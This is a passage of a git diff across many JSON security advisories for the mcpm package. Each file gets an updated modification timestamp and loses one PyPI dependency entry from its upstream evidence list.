"strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-mcpm-CVE-2025-54121.json b/advisories/BREW-mcpm-CVE-2025-54121.json index 9c133bfd7c..72be0eb267 100644 --- a/advisories/BREW-mcpm-CVE-2025-54121.json +++ b/advisories/BREW-mcpm-CVE-2025-54121.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-mcpm-CVE-2025-54121", "published": "2026-08-13T17:13:14Z", - "modified": "2026-08-13T17:13:14Z", + "modified": "2026-09-10T19:56:14Z", "upstream": [ "GHSA-2c2j-9gv5-cj73", "CVE-2025-54121", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "starlette", - "subject_version": "1.3.1", - "key": "pkg:pypi/starlette@1.3.1", - "resource": "starlette" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-mcpm-CVE-2025-59420.json b/advisories/BREW-mcpm-CVE-2025-59420.json index a3994e3cfc..beaf6a4138 100644 --- a/advisories/BREW-mcpm-CVE-2025-59420.json +++ b/advisories/BREW-mcpm-CVE-2025-59420.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-mcpm-CVE-2025-59420", "published": "2026-08-13T17:13:14Z", - "modified": "2026-08-13T17:13:14Z", + "modified": "2026-09-10T19:56:14Z", "upstream": [ "GHSA-9ggr-2464-2j32", "CVE-2025-59420", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "authlib", - "subject_version": "1.7.2", - "key": "pkg:pypi/authlib@1.7.2", - "resource": "authlib" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-mcpm-CVE-2025-61920.json b/advisories/BREW-mcpm-CVE-2025-61920.json index 1d946441f7..3aefa9eff1 100644 --- a/advisories/BREW-mcpm-CVE-2025-61920.json +++ b/advisories/BREW-mcpm-CVE-2025-61920.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-mcpm-CVE-2025-61920", "published": "2026-08-13T17:13:14Z", - "modified": "2026-08-13T17:13:14Z", + "modified": "2026-09-10T19:56:14Z", "upstream": [ "GHSA-pq5p-34cr-23v9", "CVE-2025-61920", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "authlib", - "subject_version": "1.7.2", - "key": "pkg:pypi/authlib@1.7.2", - "resource": "authlib" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-mcpm-CVE-2025-62706.json b/advisories/BREW-mcpm-CVE-2025-62706.json index eb6d6759d9..ac87970ece 100644 --- a/advisories/BREW-mcpm-CVE-2025-62706.json +++ b/advisories/BREW-mcpm-CVE-2025-62706.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-mcpm-CVE-2025-62706", "published": "2026-08-13T17:13:14Z", - "modified": "2026-08-13T17:13:14Z", + "modified": "2026-09-10T19:56:14Z", "upstream": [ "GHSA-g7f3-828f-7h7m", "CVE-2025-62706", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "authlib", - "subject_version": "1.7.2", - "key": "pkg:pypi/authlib@1.7.2", - "resource": "authlib" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-mcpm-CVE-2025-62727.json b/advisories/BREW-mcpm-CVE-2025-62727.json index 5d796e393c..26eff29309 100644 --- a/advisories/BREW-mcpm-CVE-2025-62727.json +++ b/advisories/BREW-mcpm-CVE-2025-62727.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-mcpm-CVE-2025-62727", "published": "2026-08-13T17:13:14Z", - "modified": "2026-08-13T17:13:14Z", + "modified": "2026-09-10T19:56:14Z", "upstream": [ "GHSA-7f5h-v6xp-fcq8", "CVE-2025-62727", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "starlette", - "subject_version": "1.3.1", - "key": "pkg:pypi/starlette@1.3.1", - "resource": "starlette" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-mcpm-CVE-2025-62800.json b/advisories/BREW-mcpm-CVE-2025-62800.json index 1a81fc8383..932f16ebbc 100644 --- a/advisories/BREW-mcpm-CVE-2025-62800.json +++ b/advisories/BREW-mcpm-CVE-2025-62800.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-mcpm-CVE-2025-62800", "published": "2026-08-13T17:13:14Z", - "modified": "2026-08-13T17:13:14Z", + "modified": "2026-09-10T19:56:14Z", "upstream": [ "GHSA-mxxr-jv3v-6pgc", "CVE-2025-62800", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "fastmcp", - "subject_version": "2.13.0", - "key": "pkg:pypi/fastmcp@2.13.0", - "resource": "fastmcp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-mcpm-CVE-2025-62801.json b/advisories/BREW-mcpm-CVE-2025-62801.json index 62f154045f..fc1d48f361 100644 --- a/advisories/BREW-mcpm-CVE-2025-62801.json +++ b/advisories/BREW-mcpm-CVE-2025-62801.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-mcpm-CVE-2025-62801", "published": "2026-08-13T17:13:14Z", - "modified": "2026-08-13T17:13:14Z", + "modified": "2026-09-10T19:56:14Z", "upstream": [ "GHSA-rj5c-58rq-j5g5", "CVE-2025-62801", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "fastmcp", - "subject_version": "2.13.0", - "key": "pkg:pypi/fastmcp@2.13.0", - "resource": "fastmcp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-mcpm-CVE-2025-64340.json b/advisories/BREW-mcpm-CVE-2025-64340.json index 34f2129151..b365ee2cc9 100644 --- a/advisories/BREW-mcpm-CVE-2025-64340.json +++ b/advisories/BREW-mcpm-CVE-2025-64340.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-mcpm-CVE-2025-64340", "published": "2026-08-13T17:13:14Z", - "modified": "2026-08-13T17:13:14Z", + "modified": "2026-09-10T19:56:14Z", "upstream": [ "GHSA-m8x7-r2rg-vh5g", "CVE-2025-64340", @@ -39,14 +39,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "fastmcp", - "subject_version": "2.13.0", - "key": "pkg:pypi/fastmcp@2.13.0", - "resource": "fastmcp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-mcpm-CVE-2025-65015.json b/advisories/BREW-mcpm-CVE-2025-65015.json index a57b827861..725230fe3f 100644 --- a/advisories/BREW-mcpm-CVE-2025-65015.json +++ b/advisories/BREW-mcpm-CVE-2025-65015.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-mcpm-CVE-2025-65015", "published": "2026-08-13T17:13:14Z", - "modified": "2026-08-13T17:13:14Z", + "modified": "2026-09-10T19:56:14Z", "upstream": [ "GHSA-frfh-8v73-gjg4", "CVE-2025-65015", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "joserfc", - "subject_version": "1.7.1", - "key": "pkg:pypi/joserfc@1.7.1", - "resource": "joserfc" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-mcpm-CVE-2025-66221.json b/advisories/BREW-mcpm-CVE-2025-66221.json index ef10fc2a6f..a885556f66 100644 --- a/advisories/BREW-mcpm-CVE-2025-66221.json +++ b/advisories/BREW-mcpm-CVE-2025-66221.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-mcpm-CVE-2025-66221", "published": "2026-08-13T17:13:14Z", - "modified": "2026-08-13T17:13:14Z", + "modified": "2026-09-10T19:56:14Z", "upstream": [ "GHSA-hgf8-39gv-g3f2", "CVE-2025-66221", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "werkzeug", - "subject_version": "3.1.8", - "key": "pkg:pypi/werkzeug@3.1.8", - "resource": "werkzeug" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-mcpm-CVE-2025-66416.json b/advisories/BREW-mcpm-CVE-2025-66416.json index e1843fea30..4d9793ee7d 100644 --- a/advisories/BREW-mcpm-CVE-2025-66416.json +++ b/advisories/BREW-mcpm-CVE-2025-66416.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-mcpm-CVE-2025-66416", "published": "2026-08-13T17:13:14Z", - "modified": "2026-08-13T17:13:14Z", + "modified": "2026-09-10T19:56:14Z", "upstream": [ "GHSA-9h52-p55h-vw2f", "CVE-2025-66416", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "mcp", - "subject_version": "1.27.2", - "key": "pkg:pypi/mcp@1.27.2", - "resource": "mcp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-mcpm-CVE-2025-66418.json b/advisories/BREW-mcpm-CVE-2025-66418.json index bd8afced93..99047bddb0 100644 --- a/advisories/BREW-mcpm-CVE-2025-66418.json +++ b/advisories/BREW-mcpm-CVE-2025-66418.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-mcpm-CVE-2025-66418", "published": "2026-08-13T17:13:14Z", - "modified": "2026-08-13T17:13:14Z", + "modified": "2026-09-10T19:56:14Z", "upstream": [ "GHSA-gm62-xv2j-4w53", "CVE-2025-66418", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-mcpm-CVE-2025-66471.json b/advisories/BREW-mcpm-CVE-2025-66471.json index ec858221c4..671c8ae376 100644 --- a/advisories/BREW-mcpm-CVE-2025-66471.json +++ b/advisories/BREW-mcpm-CVE-2025-66471.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-mcpm-CVE-2025-66471", "published": "2026-08-13T17:13:14Z", - "modified": "2026-08-13T17:13:14Z", + "modified": "2026-09-10T19:56:14Z", "upstream": [ "GHSA-2xpw-w6gg-jr37", "CVE-2025-66471", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-mcpm-CVE-2025-68158.json b/advisories/BREW-mcpm-CVE-2025-68158.json index 2769f457ab..1afc0b1781 100644 --- a/advisories/BREW-mcpm-CVE-2025-68158.json +++ b/advisories/BREW-mcpm-CVE-2025-68158.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-mcpm-CVE-2025-68158", "published": "2026-08-13T17:13:14Z", - "modified": "2026-08-13T17:13:14Z", + "modified": "2026-09-10T19:56:14Z", "upstream": [ "GHSA-fg6f-75jq-6523", "CVE-2025-68158", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "authlib", - "subject_version": "1.7.2", - "key": "pkg:pypi/authlib@1.7.2", - "resource": "authlib" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-mcpm-CVE-2025-69196.json b/advisories/BREW-mcpm-CVE-2025-69196.json index b6ac0adb00..c235cf3f51 100644 --- a/advisories/BREW-mcpm-CVE-2025-69196.json +++ b/advisories/BREW-mcpm-CVE-2025-69196.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-mcpm-CVE-2025-69196", "published": "2026-08-13T17:13:14Z", - "modified": "2026-08-13T17:13:14Z", + "modified": "2026-09-10T19:56:14Z", "upstream": [ "GHSA-5h2m-4q8j-pqpj", "CVE-2025-69196", @@ -39,14 +39,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "fastmcp", - "subject_version": "2.13.0", - "key": "pkg:pypi/fastmcp@2.13.0", - "resource": "fastmcp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-mcpm-CVE-2025-69872.json b/advisories/BREW-mcpm-CVE-2025-69872.json index 3a8ec14d4f..dec8cd800a 100644 --- a/advisories/BREW-mcpm-CVE-2025-69872.json +++ b/advisories/BREW-mcpm-CVE-2025-69872.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-mcpm-CVE-2025-69872", "published": "2026-08-13T17:13:14Z", - "modified": "2026-08-13T17:13:14Z", + "modified": "2026-09-10T19:56:14Z", "upstream": [ "GHSA-w8v5-vhqr-4h9v", "CVE-2025-69872", @@ -38,14 +38,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "diskcache", - "subject_version": "5.6.3", - "key": "pkg:pypi/diskcache@5.6.3", - "resource": "diskcache" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-mcpm-CVE-2025-71176.json b/advisories/BREW-mcpm-CVE-2025-71176.json index d807288020..cddd538976 100644 --- a/advisories/BREW-mcpm-CVE-2025-71176.json +++ b/advisories/BREW-mcpm-CVE-2025-71176.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-mcpm-CVE-2025-71176", "published": "2026-08-13T17:13:14Z", - "modified": "2026-08-13T17:13:14Z", + "modified": "2026-09-10T19:56:14Z", "upstream": [ "GHSA-6w46-j5rx-g56g", "CVE-2025-71176", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pytest", - "subject_version": "9.1.1", - "key": "pkg:pypi/pytest@9.1.1", - "resource": "pytest" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-mcpm-CVE-2026-21441.json b/advisories/BREW-mcpm-CVE-2026-21441.json index 5c57f5cd78..99f858ea4d 100644 --- a/advisories/BREW-mcpm-CVE-2026-21441.json +++ b/advisories/BREW-mcpm-CVE-2026-21441.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-mcpm-CVE-2026-21441", "published": "2026-08-13T17:13:14Z", - "modified": "2026-08-13T17:13:14Z", + "modified": "2026-09-10T19:56:14Z", "upstream": [ "GHSA-38jv-5279-wg99", "CVE-2026-21441", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-mcpm-CVE-2026-21860.json b/advisories/BREW-mcpm-CVE-2026-21860.json index ef453efde6..5b0f70445a 100644 --- a/advisories/BREW-mcpm-CVE-2026-21860.json +++ b/advisories/BREW-mcpm-CVE-2026-21860.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-mcpm-CVE-2026-21860", "published": "2026-08-13T17:13:14Z", - "modified": "2026-08-13T17:13:14Z", + "modified": "2026-09-10T19:56:14Z", "upstream": [ "GHSA-87hc-h4r5-73f7", "CVE-2026-21860", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "werkzeug", - "subject_version": "3.1.8", - "key": "pkg:pypi/werkzeug@3.1.8", - "resource": "werkzeug" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-mcpm-CVE-2026-23949.json b/advisories/BREW-mcpm-CVE-2026-23949.json index bead3955f3..0c0b36176e 100644 --- a/advisories/BREW-mcpm-CVE-2026-23949.json +++ b/advisories/BREW-mcpm-CVE-2026-23949.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-mcpm-CVE-2026-23949", "published": "2026-08-13T17:13:14Z", - "modified": "2026-08-13T17:13:14Z", + "modified": "2026-09-10T19:56:14Z", "upstream": [ "GHSA-58pv-8j8x-9vj2", "CVE-2026-23949", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "jaraco-context", - "subject_version": "6.1.2", - "key": "pkg:pypi/jaraco-context@6.1.2", - "resource": "jaraco-context" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-mcpm-CVE-2026-24486.json b/advisories/BREW-mcpm-CVE-2026-24486.json index 3059cfecf0..7e71607a01 100644 --- a/advisories/BREW-mcpm-CVE-2026-24486.json +++ b/advisories/BREW-mcpm-CVE-2026-24486.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-mcpm-CVE-2026-24486", "published": "2026-08-13T17:13:14Z", - "modified": "2026-08-13T17:13:14Z", + "modified": "2026-09-10T19:56:14Z", "upstream": [ "GHSA-wp53-j4wj-2cfg", "CVE-2026-24486", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "python-multipart", - "subject_version": "0.0.32", - "key": "pkg:pypi/python-multipart@0.0.32", - "resource": "python-multipart" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-mcpm-CVE-2026-25645.json b/advisories/BREW-mcpm-CVE-2026-25645.json index c4227379a2..bc85abfa40 100644 --- a/advisories/BREW-mcpm-CVE-2026-25645.json +++ b/advisories/BREW-mcpm-CVE-2026-25645.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-mcpm-CVE-2026-25645", "published": "2026-08-13T17:13:14Z", - "modified": "2026-08-13T17:13:14Z", + "modified": "2026-09-10T19:56:14Z", "upstream": [ "GHSA-gc5v-m9x4-r6x2", "CVE-2026-25645", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "requests", - "subject_version": "2.34.2", - "key": "pkg:pypi/requests@2.34.2", - "resource": "requests" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-mcpm-CVE-2026-27124.json b/advisories/BREW-mcpm-CVE-2026-27124.json index d6db13729d..deac75f1f2 100644 --- a/advisories/BREW-mcpm-CVE-2026-27124.json +++ b/advisories/BREW-mcpm-CVE-2026-27124.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-mcpm-CVE-2026-27124", "published": "2026-08-13T17:13:14Z", - "modified": "2026-08-13T17:13:14Z", + "modified": "2026-09-10T19:56:14Z", "upstream": [ "GHSA-rww4-4w9c-7733", "CVE-2026-27124", @@ -39,14 +39,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "fastmcp", - "subject_version": "2.13.0", - "key": "pkg:pypi/fastmcp@2.13.0", - "resource": "fastmcp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-mcpm-CVE-2026-27199.json b/advisories/BREW-mcpm-CVE-2026-27199.json index b8b4a38f0a..af91ca82bb 100644 --- a/advisories/BREW-mcpm-CVE-2026-27199.json +++ b/advisories/BREW-mcpm-CVE-2026-27199.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-mcpm-CVE-2026-27199", "published": "2026-08-13T17:13:14Z", - "modified": "2026-08-13T17:13:14Z", + "modified": "2026-09-10T19:56:14Z", "upstream": [ "GHSA-29vq-49wr-vm6x", "CVE-2026-27199", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "werkzeug", - "subject_version": "3.1.8", - "key": "pkg:pypi/werkzeug@3.1.8", - "resource": "werkzeug" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-mcpm-CVE-2026-27932.json b/advisories/BREW-mcpm-CVE-2026-27932.json index 680fb2de11..a111d3a613 100644 --- a/advisories/BREW-mcpm-CVE-2026-27932.json +++ b/advisories/BREW-mcpm-CVE-2026-27932.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-mcpm-CVE-2026-27932", "published": "2026-08-13T17:13:14Z", - "modified": "2026-08-13T17:13:14Z", + "modified": "2026-09-10T19:56:14Z", "upstream": [ "GHSA-w5r5-m38g-f9f9", "CVE-2026-27932", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "joserfc", - "subject_version": "1.7.1", - "key": "pkg:pypi/joserfc@1.7.1", - "resource": "joserfc" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-mcpm-CVE-2026-27962.json b/advisories/BREW-mcpm-CVE-2026-27962.json index 2b2396f803..0825376f16 100644 --- a/advisories/BREW-mcpm-CVE-2026-27962.json +++ b/advisories/BREW-mcpm-CVE-2026-27962.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-mcpm-CVE-2026-27962", "published": "2026-08-13T17:13:14Z", - "modified": "2026-08-13T17:13:14Z", + "modified": "2026-09-10T19:56:14Z", "upstream": [ "GHSA-wvwj-cvrp-7pv5", "CVE-2026-27962", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "authlib", - "subject_version": "1.7.2", - "key": "pkg:pypi/authlib@1.7.2", - "resource": "authlib" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-mcpm-CVE-2026-28490.json b/advisories/BREW-mcpm-CVE-2026-28490.json index 4962c80a6e..74f57a3c0e 100644 --- a/advisories/BREW-mcpm-CVE-2026-28490.json +++ b/advisories/BREW-mcpm-CVE-2026-28490.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-mcpm-CVE-2026-28490", "published": "2026-08-13T17:13:14Z", - "modified": "2026-08-13T17:13:14Z", + "modified": "2026-09-10T19:56:14Z", "upstream": [ "GHSA-7432-952r-cw78", "CVE-2026-28490", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "authlib", - "subject_version": "1.7.2", - "key": "pkg:pypi/authlib@1.7.2", - "resource": "authlib" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-mcpm-CVE-2026-28498.json b/advisories/BREW-mcpm-CVE-2026-28498.json index 98912511aa..2b9f271f32 100644 --- a/advisories/BREW-mcpm-CVE-2026-28498.json +++ b/advisories/BREW-mcpm-CVE-2026-28498.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-mcpm-CVE-2026-28498", "published": "2026-08-13T17:13:14Z", - "modified": "2026-08-13T17:13:14Z", + "modified": "2026-09-10T19:56:14Z", "upstream": [ "GHSA-m344-f55w-2m6j", "CVE-2026-28498", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "authlib", - "subject_version": "1.7.2", - "key": "pkg:pypi/authlib@1.7.2", - "resource": "authlib" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-mcpm-CVE-2026-28684.json b/advisories/BREW-mcpm-CVE-2026-28684.json index 0c9b26986b..4ffe62b76d 100644 --- a/advisories/BREW-mcpm-CVE-2026-28684.json +++ b/advisories/BREW-mcpm-CVE-2026-28684.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-mcpm-CVE-2026-28684", "published": "2026-08-13T17:13:14Z", - "modified": "2026-08-13T17:13:14Z", + "modified": "2026-09-10T19:56:14Z", "upstream": [ "GHSA-mf9w-mj56-hr94", "CVE-2026-28684", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "python-dotenv", - "subject_version": "1.2.2", - "key": "pkg:pypi/python-dotenv@1.2.2", - "resource": "python-dotenv" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-mcpm-CVE-2026-28802.json b/advisories/BREW-mcpm-CVE-2026-28802.json index b7a868b995..d44a3f64d0 100644 --- a/advisories/BREW-mcpm-CVE-2026-28802.json +++ b/advisories/BREW-mcpm-CVE-2026-28802.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-mcpm-CVE-2026-28802", "published": "2026-08-13T17:13:14Z", - "modified": "2026-08-13T17:13:14Z", + "modified": "2026-09-10T19:56:14Z", "upstream": [ "GHSA-7wc2-qxgw-g8gg", "CVE-2026-28802", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "authlib", - "subject_version": "1.7.2", - "key": "pkg:pypi/authlib@1.7.2", - "resource": "authlib" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-mcpm-CVE-2026-32597.json b/advisories/BREW-mcpm-CVE-2026-32597.json index 2d5a57755a..b4e835e74d 100644 --- a/advisories/BREW-mcpm-CVE-2026-32597.json +++ b/advisories/BREW-mcpm-CVE-2026-32597.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-mcpm-CVE-2026-32597", "published": "2026-08-13T17:13:14Z", - "modified": "2026-08-13T17:13:14Z", + "modified": "2026-09-10T19:56:14Z", "upstream": [ "GHSA-752w-5fwx-jx9f", "CVE-2026-32597", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pyjwt", - "subject_version": "2.13.0", - "key": "pkg:pypi/pyjwt@2.13.0", - "resource": "pyjwt" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-mcpm-CVE-2026-32871.json b/advisories/BREW-mcpm-CVE-2026-32871.json index 5fde0598e9..53ebb2e2ae 100644 --- a/advisories/BREW-mcpm-CVE-2026-32871.json +++ b/advisories/BREW-mcpm-CVE-2026-32871.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-mcpm-CVE-2026-32871", "published": "2026-08-13T17:13:14Z", - "modified": "2026-08-13T17:13:14Z", + "modified": "2026-09-10T19:56:14Z", "upstream": [ "GHSA-vv7q-7jx5-f767", "CVE-2026-32871", @@ -39,14 +39,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "fastmcp", - "subject_version": "2.13.0", - "key": "pkg:pypi/fastmcp@2.13.0", - "resource": "fastmcp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-mcpm-CVE-2026-40347.json b/advisories/BREW-mcpm-CVE-2026-40347.json index d14df86c42..288106a776 100644 --- a/advisories/BREW-mcpm-CVE-2026-40347.json +++ b/advisories/BREW-mcpm-CVE-2026-40347.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-mcpm-CVE-2026-40347", "published": "2026-08-13T17:13:14Z", - "modified": "2026-08-13T17:13:14Z", + "modified": "2026-09-10T19:56:14Z", "upstream": [ "GHSA-mj87-hwqh-73pj", "CVE-2026-40347", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "python-multipart", - "subject_version": "0.0.32", - "key": "pkg:pypi/python-multipart@0.0.32", - "resource": "python-multipart" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-mcpm-CVE-2026-41425.json b/advisories/BREW-mcpm-CVE-2026-41425.json index 9389aab76f..58e7cc2339 100644 --- a/advisories/BREW-mcpm-CVE-2026-41425.json +++ b/advisories/BREW-mcpm-CVE-2026-41425.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-mcpm-CVE-2026-41425", "published": "2026-08-13T17:13:14Z", - "modified": "2026-08-13T17:13:14Z", + "modified": "2026-09-10T19:56:14Z", "upstream": [ "GHSA-jj8c-mmj3-mmgv", "CVE-2026-41425", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "authlib", - "subject_version": "1.7.2", - "key": "pkg:pypi/authlib@1.7.2", - "resource": "authlib" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-mcpm-CVE-2026-41479.json b/advisories/BREW-mcpm-CVE-2026-41479.json index 